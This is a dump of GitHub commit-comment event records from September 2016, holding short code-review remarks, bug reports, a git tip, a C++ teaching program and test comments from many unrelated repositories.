{"id":"4622041373","type":"CommitCommentEvent","actor":{"login":"yuta527"},"repo":{"name":"bikke/hp"},"payload":{"comment":{"id":19185218,"position":4,"line":276,"path":"css_direct/ver1.css","commit_id":"c32072f7a5dfe0a1b13e9c547547d70d22df7e4e","created_at":"2016-09-27T05:26:11Z","updated_at":"2016-09-27T05:26:11Z","body":"使いにくかった"}},"created_at":"2016-09-27T05:26:11Z"}
{"id":"4622046229","type":"CommitCommentEvent","actor":{"login":"Iankodj"},"repo":{"name":"telerik/ajax-docs"},"payload":{"comment":{"id":19185239,"position":null,"line":null,"path":null,"commit_id":"3bc88e858a5a2dfc6befb6d5ef14bf68dce4ee11","created_at":"2016-09-27T05:28:12Z","updated_at":"2016-09-27T05:28:12Z","body":"Thanks for the review Erik. That closes #205 "}},"created_at":"2016-09-27T05:28:12Z"}
{"id":"4622053157","type":"CommitCommentEvent","actor":{"login":"blag"},"repo":{"name":"DjangoAdminHackers/django-admin-row-actions"},"payload":{"comment":{"id":19185260,"position":24,"line":28,"path":"django_admin_row_actions/admin.py","commit_id":"dff532127de8ed17396d2f6b3f77052ab421c536","created_at":"2016-09-27T05:30:57Z","updated_at":"2016-09-27T05:30:57Z","body":"PEP8 formatting please - don't add spaces to blank lines."}},"created_at":"2016-09-27T05:30:57Z"}
{"id":"4622058085","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19185273,"position":null,"line":null,"path":null,"commit_id":"2a265a90a6fb35dbfd841c35f20041dae02e63a0","created_at":"2016-09-27T05:33:00Z","updated_at":"2016-09-27T05:33:00Z","body":"Wow, the hack function got much more complicated "}},"created_at":"2016-09-27T05:33:00Z"}
{"id":"4622059986","type":"CommitCommentEvent","actor":{"login":"iffyuva"},"repo":{"name":"code-mancers/picks"},"payload":{"comment":{"id":19185280,"position":7,"line":7,"path":"2016-09-27.md","commit_id":"165fe22248e63278fd5af6aca42d9b91672a815a","created_at":"2016-09-27T05:33:50Z","updated_at":"2016-09-27T05:33:50Z","body":"you can also do a `-n`. ie `git clean -dfn`. it does a dry run, and shows you what all files/folders *will be* removed. also explore `-x` option :)"}},"created_at":"2016-09-27T05:33:50Z"}
{"id":"4622061882","type":"CommitCommentEvent","actor":{"login":"HarshwardhanSingh"},"repo":{"name":"code-mancers/picks"},"payload":{"comment":{"id":19185289,"position":7,"line":7,"path":"2016-09-27.md","commit_id":"165fe22248e63278fd5af6aca42d9b91672a815a","created_at":"2016-09-27T05:34:39Z","updated_at":"2016-09-27T05:34:39Z","body":"cool 👍 "}},"created_at":"2016-09-27T05:34:39Z"}
{"id":"4622061910","type":"CommitCommentEvent","actor":{"login":"osfans"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19185290,"position":null,"line":null,"path":null,"commit_id":"2781ca4fa7871b1a835de5eee58cc3a11fadfabc","created_at":"2016-09-27T05:34:40Z","updated_at":"2016-09-27T05:34:40Z","body":"@lotem 都改了，再幫忙看看還有沒有問題。"}},"created_at":"2016-09-27T05:34:40Z"}
{"id":"4622062919","type":"CommitCommentEvent","actor":{"login":"iffyuva"},"repo":{"name":"code-mancers/picks"},"payload":{"comment":{"id":19185295,"position":null,"line":null,"path":null,"commit_id":"165fe22248e63278fd5af6aca42d9b91672a815a","created_at":"2016-09-27T05:35:05Z","updated_at":"2016-09-27T05:35:05Z","body":"nice one @HarshwardhanSingh "}},"created_at":"2016-09-27T05:35:05Z"}
{"id":"4622063053","type":"CommitCommentEvent","actor":{"login":"goromlagche"},"repo":{"name":"code-mancers/picks"},"payload":{"comment":{"id":19185297,"position":7,"line":7,"path":"2016-09-27.md","commit_id":"165fe22248e63278fd5af6aca42d9b91672a815a","created_at":"2016-09-27T05:35:10Z","updated_at":"2016-09-27T05:35:10Z","body":"-f is force, I think. By default it removes files, -d is for directory. "}},"created_at":"2016-09-27T05:35:10Z"}
{"id":"4622063129","type":"CommitCommentEvent","actor":{"login":"vvs-"},"repo":{"name":"opentomb/OpenTomb"},"payload":{"comment":{"id":19185298,"position":null,"line":null,"path":null,"commit_id":"8d44a30b433706b1f753057e7cd2db75269a3fae","created_at":"2016-09-27T05:35:12Z","updated_at":"2016-09-27T05:35:12Z","body":"BTW, this commit made all objects black most of the time in _Angkor Wat_, unless a light source is very near to it."}},"created_at":"2016-09-27T05:35:12Z"}
{"id":"4622069225","type":"CommitCommentEvent","actor":{"login":"RayyaChan"},"repo":{"name":"RayyaChan/jboa"},"payload":{"comment":{"id":19185326,"position":null,"line":null,"path":null,"commit_id":"f5428ac86a7db50390bef5f4b3ec6d30c7fcabad","created_at":"2016-09-27T05:37:39Z","updated_at":"2016-09-27T05:37:39Z","body":"测试上传项目"}},"created_at":"2016-09-27T05:37:39Z"}
{"id":"4622075236","type":"CommitCommentEvent","actor":{"login":"Talvan"},"repo":{"name":"d3athrow/vgstation13"},"payload":{"comment":{"id":19185350,"position":null,"line":null,"path":null,"commit_id":"0e07cd0217834583181458ec75010de45fe43077","created_at":"2016-09-27T05:40:06Z","updated_at":"2016-09-27T05:40:06Z","body":"kek"}},"created_at":"2016-09-27T05:40:06Z"}
{"id":"4622075903","type":"CommitCommentEvent","actor":{"login":"bitkevin"},"repo":{"name":"btccom/btcpool"},"payload":{"comment":{"id":19185352,"position":null,"line":null,"path":null,"commit_id":"62563a238eb7891a0a44b77285b40578daebc2a2","created_at":"2016-09-27T05:40:19Z","updated_at":"2016-09-27T05:40:19Z","body":"`btcpool` is using short jobID (one byte) to save bandwidth when submit share. \r\n\r\nNiceHash has problem with that because: \r\n\r\n```\r\nAnother thing worth mentioning is this; we do not permit jobs with same\r\nID - if we already have job with certain ID and another one comes with\r\nsame ID, then it is discarded. So make sure you \"clear\" old jobs with\r\ncleanjobs set to true before going into rotation (rotation is possible\r\nonly after cleanjobs, as stated by official docs by slush).\r\n```\r\n\r\nIf client connect with agent string: `nicehash/`, we change job ID to `timestamp*10 + shortJobId`. When the client submit share, `jobId % 10` to get the shortJobId. `shortJobId`'s range is: `[0, 9]`."}},"created_at":"2016-09-27T05:40:19Z"}
{"id":"4622078053","type":"CommitCommentEvent","actor":{"login":"deirdresm"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19185354,"position":null,"line":null,"path":null,"commit_id":"f3b4efb51a27820a858e450f432246c9f5051a96","created_at":"2016-09-27T05:41:11Z","updated_at":"2016-09-27T05:41:11Z","body":"This broke gym rendering on all my browsers, as they're now six blocks tall at my typical zoom level.\r\n\r\nAlso, I note that the style of the dropdown menus doesn't match the other elements. It's not immediately obvious to me why after browsing the code, though.\r\n\r\n![screen shot 2016-09-26 at 10 16 26 pm](https://cloud.githubusercontent.com/assets/10251429/18861473/4a30b740-843a-11e6-9b1b-2c13a08fd5cd.png)\r\n\r\n![screen shot 2016-09-26 at 10 30 45 pm](https://cloud.githubusercontent.com/assets/10251429/18861478/5014c688-843a-11e6-8001-041905ee266d.png)\r\n"}},"created_at":"2016-09-27T05:41:11Z"}
{"id":"4622078252","type":"CommitCommentEvent","actor":{"login":"NouranSaad"},"repo":{"name":"ADDA-html-css/learn-HTML-CSS"},"payload":{"comment":{"id":19185356,"position":null,"line":null,"path":null,"commit_id":"82e9e6519f2be98cebf4bdcc2e53363f2a21734a","created_at":"2016-09-27T05:41:15Z","updated_at":"2016-09-27T05:41:15Z","body":"<html>\r\n<h> Nouran Saad </h>\r\n</html>\r\n"}},"created_at":"2016-09-27T05:41:15Z"}
{"id":"4622079902","type":"CommitCommentEvent","actor":{"login":"joyceDad"},"repo":{"name":"joyceDad/ten-issues"},"payload":{"comment":{"id":19185359,"position":null,"line":null,"path":null,"commit_id":"2c12c8c09e31fe1a5ce43b1170fb2797fc891ea8","created_at":"2016-09-27T05:41:55Z","updated_at":"2016-09-27T05:41:55Z","body":"# “投资界乔布斯”雷·达里奥的法则\r\n转载 李翔商业内参\r\n![image](https://cloud.githubusercontent.com/assets/22462178/18861310/e9dada60-84b6-11e6-8e10-5ce1f08d3264.png)\r\n![image](https://cloud.githubusercontent.com/assets/22462178/18861330/0d50d7ec-84b7-11e6-86fb-8f6fc3aef25b.png)\r\n![image](https://cloud.githubusercontent.com/assets/22462178/18861338/1b0e4464-84b7-11e6-9be8-941904d8a45b.png)\r\n![image](https://cloud.githubusercontent.com/assets/22462178/18861388/64454d3a-84b7-11e6-82cb-422f348783d0.png)\r\n![image](https://cloud.githubusercontent.com/assets/22462178/18861398/7ee46d92-84b7-11e6-9c72-d77d8d935cde.png)\r\n![image](https://cloud.githubusercontent.com/assets/22462178/18861427/a88aa8dc-84b7-11e6-9950-e6879104d6a1.png)\r\n![image](https://cloud.githubusercontent.com/assets/22462178/18861435/b58ca774-84b7-11e6-82f1-33b45d9d61ae.png)\r\n![image](https://cloud.githubusercontent.com/assets/22462178/18861450/dbb28c34-84b7-11e6-8adc-008d2f926700.png)\r\n![image](https://cloud.githubusercontent.com/assets/22462178/18861457/edd3db3e-84b7-11e6-9114-2bbe8a267932.png)\r\n![image](https://cloud.githubusercontent.com/assets/22462178/18861464/f876a7a6-84b7-11e6-9b4a-6588c155dd66.png)\r\n![image](https://cloud.githubusercontent.com/assets/22462178/18861475/0834503a-84b8-11e6-980f-f9d365a4b629.png)\r\n![image](https://cloud.githubusercontent.com/assets/22462178/18861481/112e820a-84b8-11e6-934b-c270653fff49.png)\r\n\r\n\r\n"}},"created_at":"2016-09-27T05:41:55Z"}
{"id":"4622082881","type":"CommitCommentEvent","actor":{"login":"mendozagioo"},"repo":{"name":"CodeandoMexico/tu-plataforma-abierta"},"payload":{"comment":{"id":19185364,"position":null,"line":null,"path":null,"commit_id":"3aeeb006657d1debe0d6c276527e13a796b04376","created_at":"2016-09-27T05:43:02Z","updated_at":"2016-09-27T05:43:02Z","body":"#17 Vista creada, al menos la parte visual (front-end) 😃 "}},"created_at":"2016-09-27T05:43:02Z"}
{"id":"4622092026","type":"CommitCommentEvent","actor":{"login":"jmhuggart"},"repo":{"name":"YusefFaruq/Web-Services-Dev"},"payload":{"comment":{"id":19185376,"position":null,"line":null,"path":null,"commit_id":"7009e861e5999ce9fa8712338f8baf0ea49bb87d","created_at":"2016-09-27T05:46:33Z","updated_at":"2016-09-27T05:46:33Z","body":"\r\n\r\n[enquiryforms.zip](https://github.com/YusefFaruq/Web-Services-Dev/files/494675/enquiryforms.zip)\r\n"}},"created_at":"2016-09-27T05:46:33Z"}
{"id":"4622095558","type":"CommitCommentEvent","actor":{"login":"wesselah"},"repo":{"name":"gopher2/glinetpineapple"},"payload":{"comment":{"id":19185392,"position":null,"line":null,"path":null,"commit_id":"a0b89de9d5fe3ba5d61d4f4f091827380b458b53","created_at":"2016-09-27T05:47:59Z","updated_at":"2016-09-27T05:47:59Z","body":"I do not mean the modules for the wireless adapters but the additional modules like sslstrip . Do i need to compile those ?\r\nThe first modules can be updated but then the ar150 freezes"}},"created_at":"2016-09-27T05:47:59Z"}
{"id":"4622096814","type":"CommitCommentEvent","actor":{"login":"xiguas"},"repo":{"name":"xiguas/Data-Structures"},"payload":{"comment":{"id":19185398,"position":null,"line":null,"path":null,"commit_id":"82c49165fefc00d23d89fc567fcdf6a2548047b7","created_at":"2016-09-27T05:48:32Z","updated_at":"2016-09-27T05:48:32Z","body":"`#include <iostream>\r\n#include <cstdio>\r\n#include <cstdlib>\r\n#include \"SqList.h\"\r\n\r\nusing namespace std;\r\n/* run this program using the console pauser or add your own getch, system(\"pause\") or input loop */\r\n\r\nint main(int argc, char** argv) \r\n{\r\n\r\n\tSqList L;         // 线性表 L \r\n\tL.elem = NULL; \r\n\tint flag = 1;     // 标志 \r\n\tint number;       // 选择的数字\r\n\t\r\n\tint i;            // 位置 \r\n\tElemType e;       // 元素 \r\n\t\r\n\t\r\n\twhile(flag) {\r\n\t\t\r\n\t\tprintf(\"*********************************************\\n\");\r\n\t\tprintf(\"*            线性表的基本操作               *\\n\"); \r\n\t\tprintf(\"*********************************************\\n\");\r\n\t\tprintf(\"*           1.  初始化线性表                *\\n\"); \r\n\t\tprintf(\"*           2.  向线性表中增加元素          *\\n\"); \r\n\t\tprintf(\"*           3.  从线性表中删除元素          *\\n\"); \r\n\t\tprintf(\"*           4.  查找元素                    *\\n\"); \r\n\t\tprintf(\"*           5.  返回线性表的长度            *\\n\"); \r\n\t\tprintf(\"*           6.  输出线性表                  *\\n\");   \r\n\t\tprintf(\"*           7.  清空线性表                  *\\n\");\r\n\t\tprintf(\"*           8.  销毁线性表                  *\\n\"); \r\n\t\tprintf(\"*********************************************\\n\"); \r\n\t\tprintf(\"*           请选择.........                 *\\n\"); \r\n\t\t\r\n\t\tcin >> number;\r\n\t\t\r\n\t\tprintf(\"**********************************************\\n\"); \r\n\t\t\t\r\n\t\tswitch (number) {\r\n\t\t\tcase 1 :\r\n\t\t\t\tif (InitList_Sq(L)) {\r\n\t\t\t\t\tprintf(\"初始化成功！\\n\"); \r\n\t\t\t\t}\r\n\t\t\t\telse {\r\n\t\t\t\t    printf(\"初始化失败！\\n\"); \r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\tcase 2 :\r\n\t\t\t\tif (!L.elem) {\r\n\t\t\t\t\tprintf(\"亲，请先初始化哦！\\n\"); \r\n\t\t\t\t}\r\n\t\t\t\telse {\r\n\t\t\t\t\tprintf(\"请输入要插入的位置\\n\");\r\n\t\t\t\t\tscanf(\"%d\", &i);\r\n\t\t\t\t\tprintf(\"请输入要插入的元素\\n\");\r\n\t\t\t\t\tscanf(\"%d\", &e); \r\n\t\t\t\t\r\n\t\t\t\t\tif (ListInsert_Sq(L, i, e)) {\r\n\t\t\t\t\t\tprintf(\"插入成功！\\n\"); \r\n\t\t\t\t\t}\r\n\t\t\t\t\telse {\r\n\t\t\t\t    \tprintf(\"插入失败！\\n\"); \r\n\t\t\t\t\t}\r\n\t\t\t\t} \r\n\t\t\t\tbreak;\r\n\t\t\r\n\t\t\tcase 3 :\r\n\t\t\t\tif (!L.elem) {\r\n\t\t\t\t\tprintf(\"亲，请先初始化哦！\\n\"); \r\n\t\t\t\t}\r\n\t\t\t\telse {\r\n\t\t\t\t\tprintf(\"请输入要删除的位置\\n\");\r\n\t\t\t\t\tscanf(\"%d\", &i);\r\n\t\t\t\t\tprintf(\"请输入要删除的元素\\n\");\r\n\t\t\t\t\tscanf(\"%d\", &e); \r\n\t\t\t\t\r\n\t\t\t\t\tif (ListDelete_Sq(L, i, e)) {\r\n\t\t\t\t\t\tprintf(\"删除成功！\\n\"); \r\n\t\t\t\t\t}\r\n\t\t\t\t\telse {\r\n\t\t\t\t    \tprintf(\"删除失败！\\n\"); \r\n\t\t\t\t\t}\r\n\t\t\t\t} \r\n\t\t\t\tbreak;\r\n\t\t\t\t \t\t\r\n\t\t\tcase 4 :\r\n\t\t\t\tif (!L.elem) {\r\n\t\t\t\t\tprintf(\"亲，请先初始化哦！\\n\"); \r\n\t\t\t\t}\r\n\t\t\t\telse {\r\n\t\t\t\t\tprintf(\"请输入要查找的元素\\n\");\r\n\t\t\t\t\tscanf(\"%d\", &e);\r\n\t\t\t\t\ti = LocateElem_Sq(L, e);\r\n\t\t\t\t\tif (i) {\r\n\t\t\t\t\t\tprintf(\"元素在第 %d 位置上（从0开始）！\\n\", i); \r\n\t\t\t\t\t}\r\n\t\t\t\t\telse {\r\n\t\t\t\t    \tprintf(\"该元素不存在！\\n\"); \r\n\t\t\t\t\t}\r\n\t\t\t\t} \r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\tcase 5 :\r\n\t\t\t\tif (!L.elem) {\r\n\t\t\t\t\tprintf(\"亲，请先初始化哦！\\n\"); \r\n\t\t\t\t}\r\n\t\t\t\telse {\r\n\t\t\t\t\ti = ListLength_Sq(L);\r\n\t\t\t\t\tprintf (\"线性表的长度为 %d\" ,i);\r\n\t\t\t\t} \r\n\t\t\t\tbreak;\r\n\t\t\t\t \r\n\t\t\tcase 6 :\r\n\t\t\t\tif (!L.elem) {\r\n\t\t\t\t\tprintf(\"亲，请先初始化哦！\\n\"); \r\n\t\t\t\t}\r\n\t\t\t\telse {\r\n\t\t\t\t\tPrintElem_Sq(L); \r\n\t\t\t\t} \r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\tcase 7 :\r\n\t\t\t\tif (!L.elem) {\r\n\t\t\t\t\tprintf(\"亲，请先初始化哦！\\n\"); \r\n\t\t\t\t}\r\n\t\t\t\telse {\r\n\t\t\t\t\tListClear_Sq(L);\r\n\t\t\t\t} \r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\tcase 8 :\r\n\t\t\t\tif (!L.elem) {\r\n\t\t\t\t\tprintf(\"亲，请先初始化哦！\\n\"); \r\n\t\t\t\t}\r\n\t\t\t\telse {\r\n\t\t\t\t\tListDestroy_Sq(L);\r\n\t\t\t\t} \r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\r\n\t\t\tdefault :\r\n\t\t\t\tprintf(\"请按任意键退出......\\n\");\r\n\t\t\t\tflag = 0;\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t\t\r\n\t}\r\n\treturn 0;\r\n}`"}},"created_at":"2016-09-27T05:48:32Z"}
{"id":"4622097469","type":"CommitCommentEvent","actor":{"login":"juxbox"},"repo":{"name":"ErikMinekus/traktor-kontrol-screens"},"payload":{"comment":{"id":19185399,"position":null,"line":null,"path":null,"commit_id":"d7bfcc629b706d9f8bd3447ce65f25489f66821a","created_at":"2016-09-27T05:48:48Z","updated_at":"2016-09-27T05:48:48Z","body":"Nice Erik Plase Traktor S5 Browser Screen Remove Artist.\r\n\r\nIs That The Song Can Be Seen In This Way ?\r\n\r\n Daniel Solar & Andi De Luxe - Pushin' On (Original Mix)\r\n C. Da Afro – 80’s Dream (Original Mix)\r\n Dilettante – LA CRAINTE (Original Mix)\r\n Ocean10 – Black Hero (Original Mix)\r\n Bonetti – Dope Love Thang (Original Mix)\r\n"}},"created_at":"2016-09-27T05:48:48Z"}
{"id":"4622100562","type":"CommitCommentEvent","actor":{"login":"tmylk"},"repo":{"name":"RaRe-Technologies/gensim"},"payload":{"comment":{"id":19185408,"position":25,"line":25,"path":"README.md","commit_id":"c746b7c2d13c422f5abb16d29b9cf671b6f753e6","created_at":"2016-09-27T05:50:05Z","updated_at":"2016-09-27T05:50:05Z","body":":)"}},"created_at":"2016-09-27T05:50:05Z"}
{"id":"4622103660","type":"CommitCommentEvent","actor":{"login":"r6igas"},"repo":{"name":"TabasaluYG/proix"},"payload":{"comment":{"id":19185420,"position":13,"line":13,"path":"README.md","commit_id":"9edf11f6ce3cf982ff8a88b5c95b06f3f55e82d4","created_at":"2016-09-27T05:51:22Z","updated_at":"2016-09-27T05:51:22Z","body":"asdas"}},"created_at":"2016-09-27T05:51:22Z"}
{"id":"4622107811","type":"CommitCommentEvent","actor":{"login":"jochenberger"},"repo":{"name":"bassjobsen/Bootstrap-3-Typeahead"},"payload":{"comment":{"id":19185430,"position":null,"line":null,"path":null,"commit_id":"7b59699d14865a3b7355c0e05f7a9cdc75f7e8e4","created_at":"2016-09-27T05:52:53Z","updated_at":"2016-09-27T05:52:53Z","body":"Could you please publish the release on NPM?"}},"created_at":"2016-09-27T05:52:53Z"}
{"id":"4622111586","type":"CommitCommentEvent","actor":{"login":"berryelectronics"},"repo":{"name":"MarshallOfSound/Google-Play-Music-Desktop-Player-UNOFFICIAL-"},"payload":{"comment":{"id":19185443,"position":null,"line":null,"path":null,"commit_id":"944c3f89635f26ab4ef693fca32cdb1f1e2fd13f","created_at":"2016-09-27T05:54:21Z","updated_at":"2016-09-27T05:54:21Z","body":"gonna try that out and look how they differ. not sure if i tried to make some icons look better or not by adding some pixels manually :D "}},"created_at":"2016-09-27T05:54:21Z"}
{"id":"4622117303","type":"CommitCommentEvent","actor":{"login":"guodont"},"repo":{"name":"gaohailong/P-blog"},"payload":{"comment":{"id":19185462,"position":1,"line":1,"path":".idea/libraries/Maven__com_fasterxml_jackson_core_jackson_annotations_2_2_3.xml","commit_id":"c5f0c6307d8966482fbe355eba120d6a343efec2","created_at":"2016-09-27T05:56:29Z","updated_at":"2016-09-27T05:56:29Z","body":".idea 文件夹没有忽略"}},"created_at":"2016-09-27T05:56:29Z"}
{"id":"4622119144","type":"CommitCommentEvent","actor":{"login":"ViX-Sicilian"},"repo":{"name":"openmips/stbgui"},"payload":{"comment":{"id":19185474,"position":null,"line":null,"path":null,"commit_id":"6cfcc0fb119d11844bd38e86b36f2c16cc64c755","created_at":"2016-09-27T05:57:11Z","updated_at":"2016-09-27T05:57:11Z","body":"So what's the difference between the GB Twin Tuner module and single tuner module? Pointless 'saying atv works fine or mips works fine and so on.....\r\n\r\nThere are differences in the two tuners that need to be addressed or found so we can implement a fix."}},"created_at":"2016-09-27T05:57:11Z"}
{"id":"4622120263","type":"CommitCommentEvent","actor":{"login":"jaikishan"},"repo":{"name":"jaikishan/jaikishan.github.io"},"payload":{"comment":{"id":19185475,"position":null,"line":null,"path":null,"commit_id":"b4f0c6c627c2c14d381cbdf0219d3ea735bb0ee4","created_at":"2016-09-27T05:57:38Z","updated_at":"2016-09-27T05:57:38Z","body":"disables"}},"created_at":"2016-09-27T05:57:38Z"}
{"id":"4622120955","type":"CommitCommentEvent","actor":{"login":"TiagoCardoso1983"},"repo":{"name":"celsworth/roda"},"payload":{"comment":{"id":19185479,"position":12,"line":940,"path":"lib/roda.rb","commit_id":"d3b8218de637a5456289ce07bc8a66d6efc290bb","created_at":"2016-09-27T05:57:53Z","updated_at":"2016-09-27T05:57:53Z","body":"Considering you have [this variable set and available](https://github.com/rack/rack/blob/master/lib/rack/utils.rb#L579):\r\n\r\n```ruby\r\nif b.empty? && STATUS_WITH_NON_ENTITY_BODY.include?(s)\r\n```\r\n\r\nThe argument for it is that array being allocated for every request and the many conditional operations being done. "}},"created_at":"2016-09-27T05:57:53Z"}
{"id":"4622127154","type":"CommitCommentEvent","actor":{"login":"jsstrn"},"repo":{"name":"jsstrn/fewd"},"payload":{"comment":{"id":19185492,"position":null,"line":null,"path":null,"commit_id":"a328a28a8bed9cd7b734116a8ad53003850fb87a","created_at":"2016-09-27T06:00:10Z","updated_at":"2016-09-27T06:00:10Z","body":"@yishus I love [this](jgthms.com/web-design-in-4-minutes). Do you think CSS Tricks should go in our [resources](https://github.com/jsstrn/fewd/blob/master/resources.md) page?"}},"created_at":"2016-09-27T06:00:10Z"}
{"id":"4622131061","type":"CommitCommentEvent","actor":{"login":"smalisetti"},"repo":{"name":"smalisetti/website"},"payload":{"comment":{"id":19185524,"position":null,"line":null,"path":null,"commit_id":"f83175ebe567f278a82f853abfdda6744afe17c0","created_at":"2016-09-27T06:01:28Z","updated_at":"2016-09-27T06:01:28Z","body":"Lipsum Really?"}},"created_at":"2016-09-27T06:01:28Z"}
{"id":"4622132673","type":"CommitCommentEvent","actor":{"login":"nextisd"},"repo":{"name":"nextisd/kksl"},"payload":{"comment":{"id":19185531,"position":4,"line":38,"path":"core/rest/api.go","commit_id":"ef6e16b11cf2569dc406ab813510b03567e2d2d2","created_at":"2016-09-27T06:01:59Z","updated_at":"2016-09-27T06:01:59Z","body":"good job"}},"created_at":"2016-09-27T06:01:59Z"}
{"id":"4622134220","type":"CommitCommentEvent","actor":{"login":"babyloos"},"repo":{"name":"babyloos/sokunuki_xyz"},"payload":{"comment":{"id":19185538,"position":23,"line":154,"path":"functions.php","commit_id":"c3870e42f514580a88a5aa81902b19819f9d4cfe","created_at":"2016-09-27T06:02:29Z","updated_at":"2016-09-27T06:02:29Z","body":"a\r\n"}},"created_at":"2016-09-27T06:02:29Z"}
{"id":"4622137533","type":"CommitCommentEvent","actor":{"login":"Mathadon"},"repo":{"name":"iea-annex60/modelica-annex60"},"payload":{"comment":{"id":19185546,"position":5,"line":3,"path":"Annex60/Utilities/Time/Types/ZeroTime.mo","commit_id":"40be5f74bb9c434815ff6c7ea3e0c741e5467286","created_at":"2016-09-27T06:03:43Z","updated_at":"2016-09-27T06:03:43Z","body":"yes. forgot about those :(\r\nI now did a search for GMT and I think I replaced all occurrences "}},"created_at":"2016-09-27T06:03:43Z"}
{"id":"4622139579","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19185550,"position":null,"line":null,"path":null,"commit_id":"b46eabecd3d6e8ea6dd3dc5a948ecbb65d818205","created_at":"2016-09-27T06:04:25Z","updated_at":"2016-09-27T06:04:25Z","body":"The patch is already included in the latest version. (2016.09.24) Check if your version is out-dated: ```youtube-dl --version```."}},"created_at":"2016-09-27T06:04:25Z"}
{"id":"4622161874","type":"CommitCommentEvent","actor":{"login":"bestyuan111"},"repo":{"name":"bestyuan111/hello_world"},"payload":{"comment":{"id":19185617,"position":null,"line":null,"path":null,"commit_id":"573f2497c7e1311c7dc0fd34ae8618e81c9f7a1f","created_at":"2016-09-27T06:11:57Z","updated_at":"2016-09-27T06:11:57Z","body":"first commit"}},"created_at":"2016-09-27T06:11:57Z"}
{"id":"4622163504","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"openmips/stbgui"},"payload":{"comment":{"id":19185619,"position":null,"line":null,"path":null,"commit_id":"6cfcc0fb119d11844bd38e86b36f2c16cc64c755","created_at":"2016-09-27T06:12:30Z","updated_at":"2016-09-27T06:12:30Z","body":"If you suspect a difference - identify it.\r\nIt's not pointless to claim mips or atv works. That just means mips and atv rely on dvbapi instead of /proc/bus/nim_sockets"}},"created_at":"2016-09-27T06:12:30Z"}
{"id":"4622174713","type":"CommitCommentEvent","actor":{"login":"tmylk"},"repo":{"name":"RaRe-Technologies/gensim"},"payload":{"comment":{"id":19185645,"position":95,"line":1296,"path":"gensim/models/word2vec.py","commit_id":"a355c69e8869e27b9fc1b69bc85427f49708787c","created_at":"2016-09-27T06:16:21Z","updated_at":"2016-09-27T06:16:21Z","body":"Thanks a lot for the suggestion! Added it to #800 "}},"created_at":"2016-09-27T06:16:21Z"}
{"id":"4622176394","type":"CommitCommentEvent","actor":{"login":"pnowojski"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19185665,"position":null,"line":null,"path":null,"commit_id":"c5202648a36eb42bf9699f295b336779b711dc7d","created_at":"2016-09-27T06:16:56Z","updated_at":"2016-09-27T06:16:56Z","body":"remember to later pass `revocableSystemMemoryReservation` as a separate field in stats"}},"created_at":"2016-09-27T06:16:56Z"}
{"id":"4622177945","type":"CommitCommentEvent","actor":{"login":"simha476"},"repo":{"name":"simha476/Project"},"payload":{"comment":{"id":19185669,"position":2,"line":8,"path":"sfile.txt","commit_id":"ced39b7a3e0b6066e41aaa750e87c9287eda840b","created_at":"2016-09-27T06:17:30Z","updated_at":"2016-09-27T06:17:30Z","body":"fgjtydmxffhjn jnxfgkjh"}},"created_at":"2016-09-27T06:17:30Z"}
{"id":"4622180368","type":"CommitCommentEvent","actor":{"login":"cahirwpz"},"repo":{"name":"cahirwpz/mimiker"},"payload":{"comment":{"id":19185676,"position":null,"line":null,"path":null,"commit_id":"468c50ebad61555217cfd6546443f42194045124","created_at":"2016-09-27T06:18:21Z","updated_at":"2016-09-27T06:18:21Z","body":"Much to my surprise it works even if full cache simulation is enabled. I'll have to read more about MIPS cache organization. I suspect there's ASID embedded into cache line metadata.\r\n\r\nNonetheless... because ASID is non portable element of MIPS architecture, we'll have to stop relying on it in the future. But let's not worry about it now.\r\n\r\nFinally... it'd be even better if `pmap_switch` was called from `ctx_switch` as in FreeBSD kernel: http://bxr.su/FreeBSD/sys/mips/mips/swtch.S#354 Let's embed a pointer to user's pmap in thread structure. Note, that several threads may share one pmap (e.g. all threads within a process)."}},"created_at":"2016-09-27T06:18:21Z"}
{"id":"4622180965","type":"CommitCommentEvent","actor":{"login":"Kakakirbz"},"repo":{"name":"Kakakirbz/gwapasiya"},"payload":{"comment":{"id":19185678,"position":null,"line":null,"path":null,"commit_id":"34c87badc3300b36b7789e81d02c23b46f3d4529","created_at":"2016-09-27T06:18:33Z","updated_at":"2016-09-27T06:18:33Z","body":"bolbol ka"}},"created_at":"2016-09-27T06:18:33Z"}
{"id":"4622182016","type":"CommitCommentEvent","actor":{"login":"Kakakirbz"},"repo":{"name":"Kakakirbz/gwapasiya"},"payload":{"comment":{"id":19185679,"position":null,"line":null,"path":null,"commit_id":"34c87badc3300b36b7789e81d02c23b46f3d4529","created_at":"2016-09-27T06:18:53Z","updated_at":"2016-09-27T06:18:53Z","body":"amazing"}},"created_at":"2016-09-27T06:18:53Z"}
{"id":"4622182417","type":"CommitCommentEvent","actor":{"login":"bnoordhuis"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19185680,"position":7,"line":63,"path":"lib/buffer.js","commit_id":"27e84ddd4e10cdb40d6e89d872277abe16830eb0","created_at":"2016-09-27T06:19:01Z","updated_at":"2016-09-27T06:19:01Z","body":"You could do it through a cctest or add-on test that creates an isolate with a custom `v8::ArrayBuffer::Allocator` and a node context with `node::CreateEnvironment()`."}},"created_at":"2016-09-27T06:19:01Z"}
{"id":"4622182909","type":"CommitCommentEvent","actor":{"login":"janovergoor"},"repo":{"name":"airbnb/knowledge-repo"},"payload":{"comment":{"id":19185681,"position":null,"line":null,"path":null,"commit_id":"6d050b00f3f8350dfb876c1611e2eb4d82b8928d","created_at":"2016-09-27T06:19:11Z","updated_at":"2016-09-27T06:19:11Z","body":"just FYI - you still have a reference to air/knowledge in the readme! ;)"}},"created_at":"2016-09-27T06:19:11Z"}
